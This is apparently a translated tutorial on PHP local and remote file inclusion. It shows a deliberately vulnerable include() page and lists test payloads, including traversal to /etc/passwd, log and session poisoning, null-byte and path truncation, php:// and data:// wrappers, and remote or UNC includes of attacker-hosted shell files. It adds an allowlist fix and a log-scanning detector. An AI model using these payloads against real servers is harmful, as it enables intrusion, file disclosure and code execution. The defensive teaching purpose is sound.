1. Attack scenario
- File inclusion attack
- Description
A file inclusion vulnerability is a type of code injection. Because the programmer does not validate a variable that the user controls, the user can choose which file gets included and thereby inject script or code of their own. When exploitation succeeds, the web server treats a file the attacker controls (for example one they uploaded) as PHP and executes it, which gives the attacker a foothold on the server. File inclusion vulnerabilities can lead to server-side code execution, client-side code execution and disclosure of sensitive information.
File inclusion vulnerabilities come in two forms: local file inclusion (LFI) and remote file inclusion (RFI). LFI occurs when a page takes a file name from a URL parameter without proper validation, so directory traversal strings can be injected and files outside the intended directory (or other pages) are reached. RFI occurs when the same unvalidated parameter can name an external URL, so that content fetched from another server (for example attack code hosted on the attacker's server) is included and executed by the vulnerable server.
Although most file inclusion problems occur in PHP scripts, note that other languages such as JSP and ASP can also have file inclusion vulnerabilities.
To exploit a file inclusion vulnerability successfully, two conditions must hold:
1. The web application uses a file inclusion function such as include() whose argument is built from a dynamic variable.
2. The user can control that dynamic variable.
- Test method
The intended behaviour of the program is that a request to example.com/index.php?func=add.php includes add.php, bringing in the content and functions defined in that file. Accessing http://example.com/index.php directly includes the default page default.php. The code of index.php is:
<?php
if (!empty($_GET['func'])) {
    include $_GET['func'];   // file name taken straight from the request: the vulnerable line
} else {
    include 'default.php';
}
?>
When the file is brought in through PHP's include, the file name passed in func has not been validated at all, so files the programmer never intended can be included, which may leak file contents or even inject malicious code.
If we submit example.com/index.php?func=upload/pic/evil.jpg, where evil.jpg is an image the attacker uploaded to the server with malicious PHP code appended to its end, that code is pulled into the current file and executed: include() treats the included file as PHP regardless of its extension. Anything in the included file outside <?php ... ?> tags is simply output as-is, so a file that contains no valid PHP has its contents echoed into the response, which is what makes the same bug useful for reading files.
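A hardened replacement for the index.php shown above, as an added example (not code from the original page). The func parameter is still the page selector, but it is never used as a path: it is looked up in a fixed allowlist, so traversal, null bytes, php:// and data:// wrappers and remote URLs never reach include(). The PAGES map, the pages/ directory and the CLI self-check are assumptions made for this example; the realpath() containment check is defence in depth against a bad entry in the map.

```php
<?php
// Added example (not from the original page): a hardened replacement for the
// index.php above. `func` selects a page by key instead of naming a file.

// Constructed for this example: the pages the front controller may serve.
// Keys are what the client may send; values are file names under $pageDir.
const PAGES = [
    'add'     => 'add.php',
    'list'    => 'list.php',
    'default' => 'default.php',
];

/**
 * Return the absolute path to include for request value $func, or null if the
 * request is not permitted. Kept free of globals so it can be checked from CLI.
 */
function resolve_page(string $pageDir, ?string $func): ?string
{
    $key = ($func === null || $func === '') ? 'default' : $func;
    if (!array_key_exists($key, PAGES)) {
        return null;                          // not allowlisted: refuse
    }
    $base = realpath($pageDir);
    $path = realpath($pageDir . DIRECTORY_SEPARATOR . PAGES[$key]);
    // Defence in depth: even a bad entry in PAGES cannot escape $pageDir.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

if (PHP_SAPI !== 'cli') {
    // Web entry point: same behaviour as the original, minus the vulnerability.
    $page = resolve_page(__DIR__ . '/pages', $_GET['func'] ?? null);
    if ($page === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $page;
    exit;
}

// CLI self-check with a constructed page directory: every payload class from
// the article is rejected, only allowlisted keys resolve to a file.
$dir = sys_get_temp_dir() . '/fi-demo-' . getmypid();
mkdir($dir);
foreach (PAGES as $file) {
    file_put_contents("$dir/$file", "<?php echo 'page: $file';");
}
$candidates = [
    'add', '', null,                                          // legitimate
    'upload/pic/evil.jpg',                                    // uploaded image with PHP appended
    '../../../../../../../etc/passwd',                        // traversal
    "../../../../../../../etc/passwd\0",                      // null-byte truncation
    'php://filter/convert.base64-encode/resource=index.php',  // wrapper
    'data://text/plain;base64,SSBsb3ZlIFBIUAo=',              // wrapper
    'http://example.com/shell.txt',                           // remote include
];
foreach ($candidates as $c) {
    $r = resolve_page($dir, $c);
    printf("%-58s => %s\n", var_export($c, true), $r ?? 'REJECTED');
}
array_map('unlink', glob("$dir/*"));
rmdir($dir);
```

Run it with `php index.php` to see the self-check; only add, list and the empty/absent selector resolve, everything else prints REJECTED. The point of the allowlist is that there is nothing to sanitise: a denylist of "../", "%00" or "php://" would have to keep up with every truncation and wrapper trick listed later on this page, whereas a map lookup rejects all of them by construction.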
Files that can be included
- Unrestricted local file inclusion
<?php include("inc/".$_GET['file']); ?>
When testing, you can try to include the following:
- A file in the same directory, for example: file=.htaccess
- Directory traversal, for example: file=../../../../var/lib/locate.db
- The web server error log, for example: file=../../../../../../../var/log/apache/error.log (if you can get PHP code written into the log, for instance through a crafted User-Agent, including it executes that code)
- The web server or another configuration file, for example: file=../../../../../../../usr/local/apache2/conf/httpd.conf
- An uploaded attachment, for example: file=../attachment/media/xxx.file
- A session file, for example: file=../../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7 (the file name is sess_ followed by the PHPSESSID cookie value, so if the application stores user-supplied data in the session, an attacker can plant PHP code there and include their own session file)
- A system file, for example: file=../../../../etc/passwd
- If a phpinfo() page is exposed, it reveals the name of the temporary file PHP creates for a multipart upload (shown in $_FILES), and that temporary file can be included before PHP deletes it at the end of the upload request; winning that race is a matter of keeping the upload request open long enough
-
- Restricted local file inclusion
<?php include("inc/".$_GET['file'].".htm"); ?>
Here the application appends a fixed suffix, so the payload has to get rid of it. When testing, you can try to include the following:
- Null-byte truncation, for example: ?file=../../../../../../../etc/passwd%00 (the %00 terminates the C string before ".htm" is appended; this only works on PHP versions before 5.3.4, which began rejecting paths containing NUL bytes)
- Null-byte truncation combined with directory traversal, for example: ?file=../../../../../../../../../../../var/www/%00
- Path length truncation, for example: ?file=../../../../../../../../../etc/passwd/./././././.[...]/././././. (old PHP versions truncate path strings longer than MAXPATHLEN, 4096 bytes on Linux and 256 on Windows, so the appended suffix falls off the end, while the "/." segments are collapsed when PHP normalises the path)
- Dot truncation, for example: ?file=../../../../../../boot.ini/............[...]........ (Windows only: the filesystem strips trailing dots from file names, which drops the suffix in the same way)
-
- Unrestricted remote file inclusion
<?php include($_GET['file']); ?>
Including http/ftp URLs, php://input and data:// requires allow_url_include=On in php.ini (the directive exists since PHP 5.2 and is Off by default); php://filter is not affected by it, because it reads local files. When testing, you can try to include the following:
- Remote code execution: ?file=[http|https|ftp]://example.com/shell.txt
- PHP stream input: ?file=php://input, with the PHP code to execute sent as the POST body
- PHP stream filter: ?file=php://filter/convert.base64-encode/resource=index.php, which returns the source of index.php base64-encoded instead of executing it (useful for reading the application's own code)
- data URIs: ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo= (the base64 decodes to "I love PHP"; put PHP code there instead)
- Using an XSS to execute arbitrary code: ?file=http://127.0.0.1/path/xss.php?xss=phpcode, where a reflected XSS on the same host echoes the phpcode parameter into a page that is then included and executed
-
- Restricted remote file inclusion
<?php include($_GET['file'].".htm"); ?>
When testing, you can try to include the following (the aim is again to stop the appended ".htm" from reaching the file you control):
- ?file=http://example.com/shell (the server fetches http://example.com/shell.htm, so host the payload under that name)
- ?file=http://example.com/shell.txt? (the ".htm" becomes part of the query string, which the remote server ignores)
- ?file=http://example.com/shell.txt%23 (the ".htm" lands in the URL fragment, which is never sent to the remote server)
- ?file=\\evilshare\shell.php (a UNC path; on a Windows host the file is fetched from the attacker's SMB share as if it were local, so this works even with allow_url_include=Off)
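The defender's view of the payload lists above, as an added example (not code from the original page): a small PHP script that URL-decodes each query parameter of an access-log request line and reports which file-inclusion pattern classes it matches, so a web server log can be triaged for LFI/RFI probing. The pattern names, the regexes and the log lines are all constructed for this example; the script decodes each value once, so double-encoded payloads would need a second decoding pass.

```php
<?php
// Added example (not from the original page): classify query-string values
// from access-log lines into the file-inclusion payload classes listed above.

/** Pattern name => regex, applied to the URL-decoded parameter value. */
const FI_PATTERNS = [
    'traversal'         => '#(?:^|[/\\\\])\.\.(?:[/\\\\]|$)#',   // ../ or ..\ segment
    'null-byte'         => '/\x00/',                             // %00 truncation
    'path-length-trunc' => '#(?:/\.){8,}#',                      // /./././. padding
    'dot-trunc'         => '/\.{8,}$/',                          // trailing run of dots (Windows)
    'php-wrapper'       => '#^php://#i',                         // php://input, php://filter
    'data-uri'          => '#^data:#i',
    'remote-url'        => '#^(?:https?|ftps?)://#i',
    'unc-path'          => '#^\\\\\\\\#',                        // \\server\share
    'sensitive-file'    => '#(?:/etc/passwd|boot\.ini|httpd\.conf|/var/log/|sess_|\.htaccess)#i',
];

/** Return the list of pattern names matched by one decoded parameter value. */
function classify_value(string $value): array
{
    $hits = [];
    foreach (FI_PATTERNS as $name => $re) {
        if (preg_match($re, $value) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/**
 * Parse one combined-format log line (Apache/nginx) and return
 * [client, request target, ['param' => [matched patterns...]]], or null if
 * the line does not parse. Only parameters with at least one match are kept.
 */
function analyze_log_line(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    $client = $m[1];
    $target = $m[2];
    $findings = [];
    $qpos = strpos($target, '?');
    $query = $qpos === false ? '' : substr($target, $qpos + 1);
    foreach (array_filter(explode('&', $query)) as $pair) {
        [$k, $v] = array_pad(explode('=', $pair, 2), 2, '');
        // rawurldecode turns %2e%2e%2f and %00 back into the bytes PHP would see.
        $hits = classify_value(rawurldecode($v));
        if ($hits) {
            $findings[rawurldecode($k)] = $hits;
        }
    }
    return [$client, $target, $findings];
}

// Constructed log lines for this example: one benign request, then probes
// drawn from the payload lists above (traversal, encoded traversal with %00,
// php://filter, remote URL with the "?" suffix trick, and a UNC path).
$lines = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?func=add.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?file=../../../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/7.88"',
    '198.51.100.7 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1843 "-" "curl/7.88"',
    '198.51.100.7 - - [10/Oct/2023:13:55:42 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 902 "-" "curl/7.88"',
    '198.51.100.7 - - [10/Oct/2023:13:55:43 +0000] "GET /index.php?file=http://example.com/shell.txt? HTTP/1.1" 500 0 "-" "curl/7.88"',
    '198.51.100.7 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?file=%5C%5Cevilshare%5Cshell.php HTTP/1.1" 500 0 "-" "curl/7.88"',
];
foreach ($lines as $line) {
    $r = analyze_log_line($line);
    if ($r === null || !$r[2]) {
        continue;                              // unparsable or nothing suspicious
    }
    [$client, $target, $findings] = $r;
    printf("%-14s %s\n", $client, $target);
    foreach ($findings as $param => $hits) {
        printf("    %s: %s\n", $param, implode(', ', $hits));
    }
}
```

Run with `php fi_log_scan.php` (any file name); the benign add.php request produces no output, the other five are printed with the classes they hit (the encoded line matches traversal, null-byte and sensitive-file at once). The same classify_value() function can be pointed at POST bodies or referer headers, which is where php://input payloads actually live; the access log only shows the wrapper name.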
2. Impact
A file inclusion vulnerability can be used to read the source of sensitive files and server-side scripts. A remote file inclusion vulnerability can be used directly to execute arbitrary commands, because the attacker controls the content of the included file, and a local one is often escalated to the same result through uploaded files, log files or session files as shown above. Either way it gives the attacker a foothold for further attacks.